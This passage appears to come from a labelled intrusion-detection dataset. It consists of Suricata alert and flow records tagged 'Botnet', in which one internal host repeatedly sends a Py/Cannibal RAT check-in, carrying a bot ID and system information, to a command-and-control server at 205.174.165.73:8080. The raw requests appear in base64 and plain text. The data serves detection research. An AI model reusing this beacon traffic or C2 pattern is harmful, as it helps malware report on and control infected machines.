'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobYxAAIAGT5TAqAoPza6lSct9H5AFoE9ZKTDPDlARAQA43gAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:07:25.398670+0000', 'flow_id': 2000915868226154, 'pcap_cnt': 3983880, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52093, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:07:25.332394+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobYxAAIAGT5TAqAoPza6lSct9H5AFoE9ZKTDPDlARAQA43gAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,235,954
192.168.10.15-52125-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: established, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: close_wait ; pcap_cnt: 3985782, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:07:35
60,014
Friday
[{'timestamp': '2017-07-07T13:07:35.448376+0000', 'flow_id': 1649866716999688, 'pcap_cnt': 3985782, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52125, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:07:35.389128+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobZFAAIAGT4/AqAoPza6lScudH5AvI1o4bMk3OVARAQBYmAAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:07:35.448376+0000', 'flow_id': 1649866716999688, 'pcap_cnt': 3985782, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52125, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:07:35.389128+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobZFAAIAGT4/AqAoPza6lScudH5AvI1o4bMk3OVARAQBYmAAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
309
attack
1,236,023
192.168.10.15-52134-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: established, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: close_wait ; pcap_cnt: 3987316, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:07:45
62,355
Friday
[{'timestamp': '2017-07-07T13:07:45.498358+0000', 'flow_id': 887810670307933, 'pcap_cnt': 3987316, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52134, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:07:45.436829+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobZZAAIAGT4rAqAoPza6lScumH5AbHQOvD7YcgVARAQA66gAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:07:45.498358+0000', 'flow_id': 887810670307933, 'pcap_cnt': 3987316, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52134, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:07:45.436829+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobZZAAIAGT4rAqAoPza6lScumH5AbHQOvD7YcgVARAQA66gAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
309
attack
1,236,076
192.168.10.15-52140-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 3988004, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:07:55
64,661
Friday
[{'timestamp': '2017-07-07T13:07:55.565001+0000', 'flow_id': 1766286101816742, 'pcap_cnt': 3988004, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52140, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:07:55.501158+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobZtAAIAGT4XAqAoPza6lScusH5DYWV4od69Hi1ARAQCQKgAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:07:55.565001+0000', 'flow_id': 1766286101816742, 'pcap_cnt': 3988004, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52140, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:07:55.501158+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobZtAAIAGT4XAqAoPza6lScusH5DYWV4od69Hi1ARAQCQKgAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,236,085
192.168.10.15-52142-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4000719, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:08:05
146,958
Friday
[{'timestamp': '2017-07-07T13:08:05.714820+0000', 'flow_id': 730627753487488, 'pcap_cnt': 4000719, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52142, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:08:05.568448+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobaBAAIAGT4DAqAoPza6lScuuH5DT1t+aPYdWEFARAQA+3AAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:08:05.714820+0000', 'flow_id': 730627753487488, 'pcap_cnt': 4000719, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52142, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:08:05.568448+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobaBAAIAGT4DAqAoPza6lScuuH5DT1t+aPYdWEFARAQA+3AAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,236,392
192.168.10.15-52148-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4015702, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:08:15
67,032
Friday
[{'timestamp': '2017-07-07T13:08:15.789837+0000', 'flow_id': 738878386276864, 'pcap_cnt': 4015702, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52148, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:08:15.723456+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobaVAAIAGT3vAqAoPza6lScu0H5CSSwDioGkvu1ARAQAijQAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:08:15.789837+0000', 'flow_id': 738878386276864, 'pcap_cnt': 4015702, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52148, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 